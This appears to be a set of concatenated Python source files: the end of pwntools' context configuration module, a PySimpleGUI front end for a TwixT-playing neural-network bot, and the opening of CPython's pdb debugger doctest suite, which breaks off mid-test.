if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> context.clear()
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
# Fast path to skip adding a Context frame
if not kw:
return function(*a)
with context.local(**{k:kw.pop(k) for k,v in kw.items() if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
# Read configuration options from the context section
def update_context_defaults(section):
# Circular imports FTW!
from pwnlib.util import safeeval
from pwnlib.log import getLogger
log = getLogger(__name__)
for key, value in section.items():
if key not in ContextType.defaults:
log.warn("Unknown configuration option %r in section %r" % (key, 'context'))
continue
default = ContextType.defaults[key]
if isinstance(default, (str, unicode, tuple, int, long, list, dict)):
value = safeeval.expr(value)
else:
log.warn("Unsupported configuration option %r in section %r" % (key, 'context'))
ContextType.defaults[key] = type(default)(value)
register_config('context', update_context_defaults)
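# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative comments only, not executed; assumes a
# working pwntools installation):
#
#   >>> from pwnlib.context import context
#   >>> context.update(arch='amd64', os='linux')
#   >>> context.bits, context.endian
#   (64, 'little')
#   >>> with context.local(log_level='error'):
#   ...     pass                      # noisy operations silenced per scope
#   >>> context.clear()               # back to ContextType.defaults
# ---------------------------------------------------------------------------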
|
tbui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import backend.twixt as twixt
import util.pmeter as pmeter
import constants as ct
import settings as st
import layout as lt
import files as fi
import plot as pt
import heatmap as hm
import uiboard
from tkinter import ttk
import PySimpleGUI as sg
import threading
import time
import logging
class BotEvent(threading.Event):
# used to stop or cancel a bot (thread)
def __init__(self):
super().__init__()
self.context = None
def get_context(self):
return self.context
def set(self, context):
super().set()
self.context = context
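# Note: a BotEvent is shared with the bot worker thread. The UI sets it with
# ct.ACCEPT_EVENT to accept the best move found so far, or ct.CANCEL_EVENT to
# discard the search; call_bot() below checks is_set()/get_context() to decide
# whether the chosen move should still be executed.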
class ProgressWindow(sg.Window):
def __init__(self):
layout = lt.SplashScreenLayout().get_layout()
super().__init__('twixtbot-ui', layout,
background_color=sg.theme_background_color(),
keep_on_top=True, finalize=True, margins=(15, 15))
def update(self, text, progress):
self.__getitem__(ct.K_SPLASH_PROGRESS_BAR[0]).UpdateBar(progress, 100)
self.__getitem__(ct.K_SPLASH_STATUS_TEXT[0]).Update(text)
self.refresh()
class TwixtbotUI():
def __init__(self, game, stgs, board):
# Show splash screen during init
init_window = ProgressWindow()
init_window.update('initializing GUI ...', 5)
# init class properties
self.board = board
self.game = game
self.moves_score = {}
self.stgs = stgs
self.bot_event = None
self.redo_moves = []
self.next_move = None
self.logger = logging.getLogger(ct.LOGGER)
self.ui_to_be_updated = threading.Event()
# Setup main GUI window
layout = lt.MainWindowLayout(board, stgs).get_layout()
self.window = sg.Window(ct.WINDOW_TITLE,
layout,
margins=(25, 25),
finalize=True)
canvas = self.window[ct.K_EVAL_MOVES[1]].TKCanvas
self.eval_moves_plot = pt.ThreeBarPlot(canvas, ct.EVAL_PLOT_COLOR)
canvas = self.window[ct.K_VISITS[1]].TKCanvas
self.visit_plot = pt.ThreeBarPlot(canvas, ct.VISITS_PLOT_COLOR)
self.visit_plot.update()
canvas = self.window[ct.K_EVAL_HIST[1]].TKCanvas
self.eval_hist_plot = pt.EvalHistPlot(canvas, stgs)
def motion(event):
if stgs.get(ct.K_SHOW_CURSOR_LABEL[1]):
coords = (event.x, stgs.get(
ct.K_BOARD_SIZE[1]) - event.y)
_, move = board.get_move(coords)
board.draw_cursor_label(move)
self.window["BOARD"].TKCanvas.bind('<Motion>', motion)
self.window.bind('<Alt-b>', ct.B_BOT_MOVE)
self.window.bind('<Alt-a>', ct.B_ACCEPT)
self.window.bind('<Alt-c>', ct.B_CANCEL)
self.window.bind('<Alt-u>', ct.B_UNDO)
self.window.bind('<Alt-d>', ct.B_REDO)
self.window.bind('<Alt-g>', ct.B_RESIGN)
self.window.bind('<Alt-r>', ct.B_RESET)
self.window.bind('<Alt-e>', ct.EVENT_SHORTCUT_SHOW_EVALUATION)
self.window.bind('<Alt-m>', ct.EVENT_SHORTCUT_HEATMAP)
self.window.bind('<Alt-v>', ct.EVENT_SHORTCUT_VISUALIZE_MCTS)
self.window.bind('<Alt-KeyPress-1>', ct.EVENT_SHORTCUT_AUTOMOVE_1)
self.window.bind('<Alt-KeyPress-2>', ct.EVENT_SHORTCUT_AUTOMOVE_2)
self.window.bind('<Alt-Right->', ct.EVENT_SHORTCUT_TRIALS_1_PLUS)
self.window.bind('<Alt-Left->', ct.EVENT_SHORTCUT_TRIALS_1_MINUS)
self.window.bind('<Alt-Shift-Right->', ct.EVENT_SHORTCUT_TRIALS_2_PLUS)
self.window.bind('<Alt-Shift-Left->',
ct.EVENT_SHORTCUT_TRIALS_2_MINUS)
# Apply settings
init_window.update('refreshing settings ...', 10)
self.update_settings_changed()
# import
init_window.update('importing modules ...', 30)
import backend.nnmplayer as nnmplayer # noqa: F401
# Initialize and warm-up bots
self.bots = [None, None]
if self.stgs.same_models():
init_window.update('initializing bots ...', 60)
self.init_bot(1) # init bot[1]
self.init_bot(2, self.bots[1].evaluator)
else:
init_window.update('initializing bot 1 ...', 50)
self.init_bot(1)
init_window.update('initializing bot 2 ...', 70)
self.init_bot(2)
init_window.update('warming up bots ...', 90)
self.bots[0].nm.eval_game(self.game)
self.bots[1].nm.eval_game(self.game)
# Update evaluation graph
self.update_evals()
# Close and destroy splash window
init_window.update('ready to play', 100)
time.sleep(1)
init_window.close()
def __del__(self):
if hasattr(self, 'window'):
self.window.close()
del self.stgs
del self.game
del self.board
def get_control(self, key, player=None):
if player:
return self.window[key[player]]
return self.window[key[1]]
def get_current(self, key):
return self.stgs.get_current(key, self.game)
def set_current(self, key, value):
return self.stgs.set_current(key, value, self.game)
# update_ functions to update ui controls
def update_tooltips(self):
self.get_control(ct.K_AUTO_MOVE, 1).set_tooltip(
self.stgs.get_tooltip(1))
self.get_control(ct.K_AUTO_MOVE, 2).set_tooltip(
self.stgs.get_tooltip(2))
def update_turn_indicators(self):
turn = ["", ""]
if self.game.result == twixt.RESIGN:
turn[self.game.turn] = ""
turn[1 - self.game.turn] = ct.TURN_RESIGNED
elif self.game.just_won():
turn[self.game.turn] = ct.TURN_HAS_WON
turn[1 - self.game.turn] = ""
elif self.game.turn == 1:
turn = [ct.TURN_CHAR, '']
else:
turn = ['', ct.TURN_CHAR]
self.get_control(ct.K_TURN_INDICATOR, 1).Update(turn[0])
self.get_control(ct.K_TURN_INDICATOR, 2).Update(turn[1])
def update_history(self):
text = ""
for i, move in enumerate(self.game.history):
text += "\n" if i > 0 and i % 2 == 0 else ""
text += str(i + 1).rjust(2, ' ') + '. ' + str(move).upper()
if move == twixt.SWAP:
m1 = self.game.history[0]
text += " " + chr(m1.y + ord('A')) + str(m1.x + 1)
text += "\t\t" if i % 2 == 0 else ""
self.get_control(ct.K_MOVES).Update(text)
def calc_eval(self):
score, moves, P = self.bots[self.game.turn].nm.eval_game(self.game)
# get score from white's perspective
sc = round((2 * self.game.turn - 1) * score, 3)
self.next_move = sc, moves, P
# Add sc to dict of historical scores
self.moves_score[len(self.game.history)] = sc
return sc, moves, P
def clear_evals(self):
self.get_control(ct.K_EVAL_NUM).Update('')
self.get_control(ct.K_EVAL_BAR).Update(0)
self.eval_moves_plot.update()
self.eval_hist_plot.update()
self.visit_plot.update()
self.next_move = None
def update_evals(self):
if not self.get_control(ct.K_SHOW_EVALUATION).get():
self.clear_evals()
return
if not self.game_over(False):
sc, moves, P = self.calc_eval()
self.get_control(ct.K_EVAL_NUM).Update(sc)
self.get_control(ct.K_EVAL_BAR).Update(1000 * sc + 1000)
# update chart
values = {"moves": moves, "Y": P}
self.eval_moves_plot.update(values, 1000)
# clean visits
self.visit_plot.update()
self.eval_hist_plot.update(self.moves_score)
def update_evalbar_colors(self):
s = ttk.Style()
ebs = self.window[ct.K_EVAL_BAR[1]].TKProgressBar.style_name
s.configure(ebs, background=self.stgs.get(ct.K_COLOR[1]))
s.configure(ebs, troughcolor=self.stgs.get(ct.K_COLOR[2]))
def update_progress(self, values=None):
if values is None:
text = ""
value = 0
max_value = 0
else:
max_value = values["max"]
value = values["current"]
if self.stgs.get(ct.K_SMART_ACCEPT[1]) and "Y" in values:
diff = values["Y"][0] - values["Y"][1]
if diff > max_value - value:
# 2nd best cannot catch up => accept (if not already
# cancelled)
if self.bot_event.get_context() != ct.CANCEL_EVENT:
self.handle_accept_bot()
# reduce max val
while (diff > values["max"] - max_value + ct.MCTS_TRIAL_CHUNK
and max_value >= value + ct.MCTS_TRIAL_CHUNK):
max_value -= ct.MCTS_TRIAL_CHUNK
text = str(value) + "/" + str(max_value) + " " + \
str(round(100 * value / max_value)) + "% "
v = 100.0 * (value + values["max"] - max_value) / values["max"]
self.timer.update(v)
text += self.timer.getstatus()
self.get_control(ct.K_PROGRESS_NUM).Update(text)
self.get_control(ct.K_PROGRESS_BAR).UpdateBar(value, max_value)
def update_after_move(self, complete=True):
if self.get_control(ct.K_HEATMAP).get():
heatmap = hm.Heatmap(self.game, self.bots[self.game.turn])
else:
heatmap = None
self.board.draw(heatmap, complete)
self.window.refresh()
# reset progress
self.update_progress()
self.update_turn_indicators()
self.update_history()
if self.get_control(ct.K_SHOW_EVALUATION).get():
self.update_evals()
def update_settings_changed(self):
self.board.draw()
self.window.refresh()
# update ui
for p in [1, 2]:
self.get_control(ct.K_NAME, p).Update(
self.stgs.get(ct.K_NAME[p]))
self.get_control(ct.K_COLOR, p).erase()
self.get_control(ct.K_COLOR, p).DrawCircle(
(7, 9), 6, self.stgs.get(ct.K_COLOR[p]),
self.stgs.get(ct.K_COLOR[p]))
self.get_control(ct.K_AUTO_MOVE, p).Update(
self.stgs.get(ct.K_AUTO_MOVE[p]))
self.get_control(ct.K_TRIALS, p).Update(
self.stgs.get(ct.K_TRIALS[p]))
self.update_turn_indicators()
self.update_tooltips()
self.update_evalbar_colors()
self.eval_hist_plot.update(self.moves_score)
self.update_bots()
self.update_game()
self.update_logger()
def reset_game(self):
self.game.__init__(self.stgs.get(ct.K_ALLOW_SCL[1]))
self.moves_score = {}
# get eval of empty board to avoid gap at x=0 in plot in loaded games
self.calc_eval()
def update_game(self):
self.game.allow_scl = self.stgs.get(ct.K_ALLOW_SCL[1])
def update_logger(self):
self.logger.setLevel(self.stgs.get(ct.K_LOG_LEVEL[1]))
# bot functions
def update_bots(self):
for t in [0, 1]:
if hasattr(self, 'bots') and self.bots[t] is not None:
p = self.game.turn_to_player(t)
# update bot
self.bots[t].allow_swap = self.stgs.get(
ct.K_ALLOW_SWAP[1])
self.bots[t].num_trials = int(
self.stgs.get(ct.K_TRIALS[p]))
self.bots[t].temperature = float(
self.stgs.get(ct.K_TEMPERATURE[p]))
self.bots[t].random_rotation = self.stgs.get(
ct.K_RANDOM_ROTATION[p])
self.bots[t].add_noise = float(
self.stgs.get(ct.K_ADD_NOISE[p]))
# update bot's mcts object
self.bots[t].nm.smart_root = self.stgs.get(ct.K_SMART_ROOT[p])
self.bots[t].nm.cpuct = float(
self.stgs.get(ct.K_CPUCT[p]))
self.bots[t].nm.visualize_mcts = self.get_control(
ct.K_VISUALIZE_MCTS).get()
def init_bot(self, player, evaluator=None):
args = {
"allow_swap": self.stgs.get(ct.K_ALLOW_SWAP[1]),
"model": self.stgs.get(ct.K_MODEL_FOLDER[player]),
"trials": self.stgs.get(ct.K_TRIALS[player]),
"smart_root": self.stgs.get(ct.K_SMART_ROOT[player]),
"temperature": self.stgs.get(ct.K_TEMPERATURE[player]),
"random_rotation": self.stgs.get(ct.K_RANDOM_ROTATION[player]),
"add_noise": self.stgs.get(ct.K_ADD_NOISE[player]),
"cpuct": self.stgs.get(ct.K_CPUCT[player]),
"board": self.board,
"evaluator": evaluator
}
import backend.nnmplayer as nnmplayer
self.bots[2 - player] = nnmplayer.Player(**args)
def call_bot(self):
# mcts, or first/second move (we are in a thread)
response = self.bots[self.game.turn].pick_move(
self.game, self.window, self.bot_event)
if (self.bot_event is None or not self.bot_event.is_set() or
self.bot_event.get_context() == ct.ACCEPT_EVENT):
# bot has not been cancelled (but is finished or accepted)
# so execute move.
# execute move must be inside thread!
self.execute_move(response["moves"][0])
else:
# reset history_at_root resets tree and visit counts
self.bots[self.game.turn].nm.history_at_root = None
return
def launch_call_bot(self):
self.visit_plot.update()
self.update_progress()
self.window[ct.K_SPINNER[1]].Update(visible=True)
self.bot_event = BotEvent()
self.ui_to_be_updated.set()
self.thread = threading.Thread(target=self.call_bot, args=())
self.timer = pmeter.ETA(100.0, max_seconds=20)
self.thread.start()
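# Threading model (summary of the code above and below): launch_call_bot() runs
# call_bot() in a worker thread while the GUI keeps polling; get_event()
# switches to a 200 ms timeout read while the thread is alive. The bot reports
# progress through K_THREAD window events handled by handle_thread_event(), and
# the Accept/Cancel buttons signal it via the shared BotEvent.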
# handle events
def handle_board_click(self, values):
if self.game_over():
return
move, _ = self.board.get_move(values[ct.K_BOARD[1]])
if move is not None:
# clear move statistics
self.execute_move(move)
self.update_after_move(False)
def handle_open_file(self):
players, moves, x_lines = fi.get_game(self.stgs.get(ct.K_ALLOW_SCL[1]))
if players is None:
return
# assign player names
self.stgs.settings[ct.K_NAME[1]] = players[0]
self.stgs.settings[ct.K_NAME[2]] = players[1]
# adjust settings if needed
if x_lines:
self.stgs.set(ct.K_ALLOW_SCL[1], True)
self.update_settings_changed()
# reset game (this also applies a changed crossing-links setting)
self.reset_game()
# replay game
try:
lt.popup("loading game...")
for m in moves:
self.execute_move(m)
self.calc_eval()
except Exception:
lt.popup("invalid move: " + str(m))
self.update_after_move()
def handle_save_file(self):
fi.save_game(
[self.stgs.settings[ct.K_NAME[p]] for p in (1, 2)],
self.game.history,
self.game.SIZE,
self.game is not None)
def handle_resign(self):
if self.game_over():
return
self.execute_move(twixt.RESIGN)
def handle_undo(self):
if self.game.result == twixt.RESIGN:
self.game.result = None
self.redo_moves.append(twixt.RESIGN)
return
gl = len(self.game.history)
if gl in self.moves_score:
del self.moves_score[gl]
if gl > 0:
self.redo_moves.append(self.game.history[-1])
self.game.undo()
# switch off auto move
if self.get_current(ct.K_AUTO_MOVE):
self.set_current(ct.K_AUTO_MOVE, False)
self.get_control(
ct.K_AUTO_MOVE, self.game.turn_to_player()).Update(False)
def handle_redo(self):
if len(self.redo_moves) > 0:
self.execute_move(self.redo_moves.pop(), False)
def handle_accept_bot(self):
self.bot_event.set(ct.ACCEPT_EVENT)
def handle_cancel_bot(self):
self.bot_event.set(ct.CANCEL_EVENT)
# switch off auto move
# (do not use self.game.turn_to_player() to determine current
# player during mcts)
if self.get_control(ct.K_TURN_INDICATOR, 1).get() == ct.TURN_CHAR:
p = 1
else:
p = 2
self.stgs.set(ct.K_AUTO_MOVE[p], False)
self.get_control(ct.K_AUTO_MOVE, p).Update(False)
def handle_thread_event(self, values):
self.logger.info("Bot response: %s", values)
if values["max"] != 0:
# mcts case
self.update_progress(values)
if (self.get_control(ct.K_SHOW_EVALUATION).get() and
"moves" in values and "current" in values and
len(values["moves"]) > 1):
self.visit_plot.update(values, max(1, values["max"]))
def handle_accept_and_cancel(self, event):
if event == ct.B_ACCEPT:
self.handle_accept_bot()
elif event == ct.B_CANCEL:
self.handle_cancel_bot()
elif event in [ct.K_BOARD[1],
ct.B_UNDO, ct.B_REDO, ct.B_RESIGN, ct.B_RESET,
ct.B_BOT_MOVE,
ct.K_VISUALIZE_MCTS[1],
ct.EVENT_SHORTCUT_VISUALIZE_MCTS,
ct.K_HEATMAP[1], ct.EVENT_SHORTCUT_HEATMAP,
ct.K_SHOW_EVALUATION[1],
ct.EVENT_SHORTCUT_SHOW_EVALUATION]:
lt.popup("bot in progress. Click Accept or Cancel.")
# undo checkbox change
if event == ct.K_VISUALIZE_MCTS[1]:
self.get_control(ct.K_VISUALIZE_MCTS).update(
not self.get_control(ct.K_VISUALIZE_MCTS).get())
elif event == ct.K_HEATMAP[1]:
self.get_control(ct.K_HEATMAP).update(
not self.get_control(ct.K_HEATMAP).get())
elif event == ct.K_SHOW_EVALUATION[1]:
self.get_control(ct.K_SHOW_EVALUATION).update(
not self.get_control(ct.K_SHOW_EVALUATION).get())
def thread_is_alive(self):
return (hasattr(self, 'thread') and
self.thread and self.thread.is_alive())
def game_over(self, display_message=True):
if self.game.just_won():
if display_message:
lt.popup('Game over: ' + self.stgs.get(
ct.K_NAME[3 - self.game.turn_to_player()]) + ' has won!')
return True
elif self.game.result == twixt.RESIGN:
if display_message:
lt.popup('Game over: ' +
self.get_current(ct.K_NAME) + ' has resigned!')
return True
return False
def execute_move(self, move, clear_redo_moves=True):
if clear_redo_moves:
self.redo_moves = []
if move == twixt.RESIGN:
self.game.result = twixt.RESIGN
self.game_over()
return
elif move == twixt.SWAP:
self.game.play_swap()
else:
self.game.play(move)
self.game_over()
self.next_move = None
def bot_move(self):
if self.next_move is None:
self.calc_eval()
if not self.game_over():
if ((-2 * self.game.turn + 1) * self.next_move[0] >
self.stgs.get(ct.K_RESIGN_THRESHOLD[1])):
# resign-threshold reached
self.visit_plot.update()
self.update_progress()
self.execute_move(twixt.RESIGN)
self.update_after_move(False)
elif self.get_current(ct.K_TRIALS) == 0:
# no mcts
if len(self.game.history) >= 2:
# we already have the next move
# from eval update => execute it
self.execute_move(self.next_move[1][0])
else:
# first or second move (special policy)
# => sync call + execute
response = self.bots[self.game.turn].pick_move(
self.game, self.window, self.bot_event)
self.execute_move(response["moves"][0])
# window update
self.update_after_move(False)
# send pseudo-event to keep loop going
# necessary in case of trials==0 and
# auto_move=True for both bots
self.window.write_event_value('PSEUDO', None)
else:
# mcts => async bot call in thread
self.launch_call_bot()
def create_settings_window(self):
sd = lt.SettingsDialogLayout()
layout = sd.get_layout()
settings_window = sg.Window(ct.SETTINGS_DIALOG_TITLE, layout,
keep_on_top=True, finalize=True,
margins=(15, 15))
self.stgs.update_window(settings_window)
return settings_window
def settings_dialog(self):
dialog = self.create_settings_window()
while True:
event, values = dialog.read()
if event == sg.WIN_CLOSED or event == ct.B_CANCEL:
break
elif event == ct.B_RESET_DEFAULT:
self.stgs.reset_to_default(dialog)
dialog.refresh()
elif event == ct.B_APPLY_SAVE:
self.stgs.save(values)
break
dialog.close()
return event
def create_about_window(self):
ad = lt.AboutDialogLayout()
layout = ad.get_layout()
about_window = sg.Window(ct.ABOUT_DIALOG_TITLE, layout, finalize=True,
keep_on_top=True, margins=(15, 15))
return about_window
def about_dialog(self):
dialog = self.create_about_window()
while True:
event, values = dialog.read()
if event in [sg.WIN_CLOSED, ct.B_OK, ct.EVENT_EXIT]:
break
dialog.close()
def get_event(self):
if self.thread_is_alive() or self.ui_to_be_updated.is_set():
self.get_control(ct.K_SPINNER).UpdateAnimation(ct.SPINNER_IMAGE)
# frequent read to update progress gif
return self.window.read(timeout=200)
else:
# blocking read when no bot is processing
return self.window.read()
def handle_menue_event(self, event, values):
if event == ct.ITEM_SETTINGS.replace('&', ''):
if self.settings_dialog() == ct.B_APPLY_SAVE:
self.update_settings_changed()
return True
if event == ct.ITEM_ABOUT.replace('&', ''):
self.about_dialog()
return True
if event == ct.ITEM_OPEN_FILE.replace('&', ''):
self.handle_open_file()
return True
if event == ct.ITEM_SAVE_FILE.replace('&', ''):
self.handle_save_file()
return True
return False
def handle_button_event(self, event, values):
if event == ct.B_BOT_MOVE:
self.bot_move()
return True
if event == ct.B_UNDO:
self.handle_undo()
self.update_after_move()
return True
if event == ct.B_REDO:
self.handle_redo()
self.update_after_move()
return True
if event == ct.B_RESIGN:
self.handle_resign()
self.update_turn_indicators()
return True
if event == ct.B_RESET:
self.reset_game()
self.update_after_move()
return True
return False
def handle_shortcut_event(self, event, values):
if event == ct.EVENT_SHORTCUT_HEATMAP:
# toggle heatmap checkbox and redraw board
self.get_control(ct.K_HEATMAP).Update(
not self.get_control(ct.K_HEATMAP).get())
self.update_after_move()
return True
if event == ct.EVENT_SHORTCUT_SHOW_EVALUATION:
# toggle evaluation checkbox and redraw board
self.get_control(ct.K_SHOW_EVALUATION).Update(
not self.get_control(ct.K_SHOW_EVALUATION).get())
self.update_after_move()
return True
if event == ct.EVENT_SHORTCUT_VISUALIZE_MCTS:
# toggle visualize checkbox and redraw board
self.get_control(ct.K_VISUALIZE_MCTS).Update(
not self.get_control(ct.K_VISUALIZE_MCTS).get())
self.update_after_move()
return True
if event == ct.EVENT_SHORTCUT_AUTOMOVE_1:
check = self.get_control(ct.K_AUTO_MOVE, 1).get()
self.get_control(ct.K_AUTO_MOVE, 1).Update(not check)
self.stgs.set(ct.K_AUTO_MOVE[1], not check)
return True
if event == ct.EVENT_SHORTCUT_AUTOMOVE_2:
check = self.get_control(ct.K_AUTO_MOVE, 2).get()
self.get_control(ct.K_AUTO_MOVE, 2).Update(not check)
self.stgs.set(ct.K_AUTO_MOVE[2], not check)
return True
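# helper: bump the trials slider for the given player by one TRIALS_RESOLUTION
# step, clamp it to the limit via func (min for plus, max for minus), then
# push the new value into settings, the slider control and the bots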
def update_slider(player, func, limit, factor):
trials_new = func(self.get_control(
ct.K_TRIALS, player).Widget.get() +
factor * ct.TRIALS_RESOLUTION, limit)
self.stgs.set(ct.K_TRIALS[player], trials_new)
self.get_control(ct.K_TRIALS, player).Update(trials_new)
self.update_bots()
return True
if event == ct.EVENT_SHORTCUT_TRIALS_1_PLUS:
return update_slider(1, min, ct.TRIALS_MAX, 1)
if event == ct.EVENT_SHORTCUT_TRIALS_1_MINUS:
return update_slider(1, max, 0, -1)
if event == ct.EVENT_SHORTCUT_TRIALS_2_PLUS:
return update_slider(2, min, ct.TRIALS_MAX, 1)
if event == ct.EVENT_SHORTCUT_TRIALS_2_MINUS:
return update_slider(2, max, 0, -1)
return False
def handle_event(self, event, values):
# menu events
if self.handle_menue_event(event, values):
return
# click on auto move or trials (no shortcuts)
if event in [ct.K_AUTO_MOVE[1], ct.K_AUTO_MOVE[2],
ct.K_TRIALS[1], ct.K_TRIALS[2]]:
# handle trials sliders and auto-move checkboxes
self.stgs.update(event, values)
self.update_bots()
return
# thread events
if event == ct.K_THREAD[1]:
# handle event sent from bot
self.handle_thread_event(values[ct.K_THREAD[1]])
return
# button events while bot is processing (Accept, Cancel)
if self.thread_is_alive():
self.handle_accept_and_cancel(event)
return
# keyboard shortcut events (buttons and control bar)
if self.handle_shortcut_event(event, values):
return
# button events while bot is not processing
if self.handle_button_event(event, values):
return
# selection of mcts visualization
if event == ct.K_VISUALIZE_MCTS[1]:
self.update_bots()
return
# click on evaluation checkbox (no shortcuts)
if event == ct.K_SHOW_EVALUATION[1]:
self.update_evals()
return
# click on heatmap (no shortcuts)
if event == ct.K_HEATMAP[1]:
self.update_after_move()
return
# click on board event
if event == ct.K_BOARD[1]:
self.handle_board_click(values)
return
# other events go here...
self.logger.debug("event not handled: %s, %s", event, values)
def main():
# initialize settings from config.json
stgs = st.Settings()
# Init logging
logging.basicConfig(format=ct.LOG_FORMAT,
level=stgs.get(ct.K_LOG_LEVEL[1]))
# logger = logging.getLogger(ct.LOGGER)
# initialize game, pass "allow self crossing links" setting
game = twixt.Game(stgs.get(ct.K_ALLOW_SCL[1]))
# initialize twixt board (draw it later)
board = uiboard.UiBoard(game, stgs)
# initialize ui
ui = TwixtbotUI(game, stgs, board)
# Event Loop
while True:
if not ui.thread_is_alive():
if ui.ui_to_be_updated.is_set():
# thread has finished, we must update UI now
ui.update_after_move(False)
ui.get_control(ct.K_SPINNER).Update(visible=False)
ui.ui_to_be_updated.clear()
if ui.get_current(ct.K_AUTO_MOVE):
ui.bot_move()
event, values = ui.get_event()
if event == "__TIMEOUT__":
continue
elif event == sg.WIN_CLOSED or event == ct.EVENT_EXIT:
if ui.thread_is_alive():
ui.handle_cancel_bot()
ui.window.close()
break
ui.handle_event(event, values)
if __name__ == "__main__":
main()
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
from bdb import Breakpoint
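# Reset bdb's module-level breakpoint bookkeeping so breakpoint numbering starts at 1 in each test.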
def reset_Breakpoint():
Breakpoint.next = 1
Breakpoint.bplist = {}
Breakpoint.bpbynumber = [None]
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
